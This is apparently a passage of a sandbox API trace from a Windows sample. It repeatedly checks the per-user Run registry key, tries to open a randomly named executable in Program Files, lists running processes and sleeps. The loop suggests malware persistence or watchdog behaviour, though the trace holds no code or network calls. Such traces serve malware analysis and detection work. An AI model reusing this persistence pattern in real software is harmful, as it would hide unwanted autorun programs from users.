ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.539] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731fe8) returned 1 [0247.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0247.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0247.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0247.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0247.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0247.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.831] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0247.882] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0247.887] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0247.888] NtClose (Handle=0x270) returned 0x0 [0247.888] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.888] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.888] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731db8) returned 1 [0247.888] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.888] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.888] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731f08) returned 1 [0247.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0247.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0247.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0247.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0247.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0248.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.064] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0248.073] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0248.074] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0248.074] NtClose (Handle=0x270) returned 0x0 [0248.075] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.075] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.075] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731cd8) returned 1 [0248.075] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.075] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.075] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731a38) returned 1 [0248.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0248.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0248.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0248.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0248.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0248.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.266] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0248.343] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0248.345] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0248.345] NtClose (Handle=0x270) returned 0x0 [0248.345] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.345] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.345] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731fe8) returned 1 [0248.345] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.346] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.346] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731cd8) returned 1 [0248.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0248.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0248.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0248.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0248.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0249.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.323] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0249.598] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0249.601] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0249.601] NtClose (Handle=0x270) returned 0x0 [0249.601] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.601] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.601] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7320c8) returned 1 [0249.602] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.602] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.602] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731b18) returned 1 [0249.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0249.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0249.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0249.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0249.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0251.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.069] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0251.316] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0251.318] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0251.318] NtClose (Handle=0x270) returned 0x0 [0251.318] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.318] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.318] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731a38) returned 1 [0251.318] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.319] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.319] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7320c8) returned 1 [0251.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0251.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0251.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0251.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0251.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0251.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.850] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0252.777] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0252.779] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0252.779] NtClose (Handle=0x270) returned 0x0 [0252.779] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.779] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.780] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7319c8) returned 1 [0252.781] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.781] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.781] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731e28) returned 1 [0252.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0252.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0255.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0255.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0255.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0256.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.554] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0257.070] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0257.071] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: 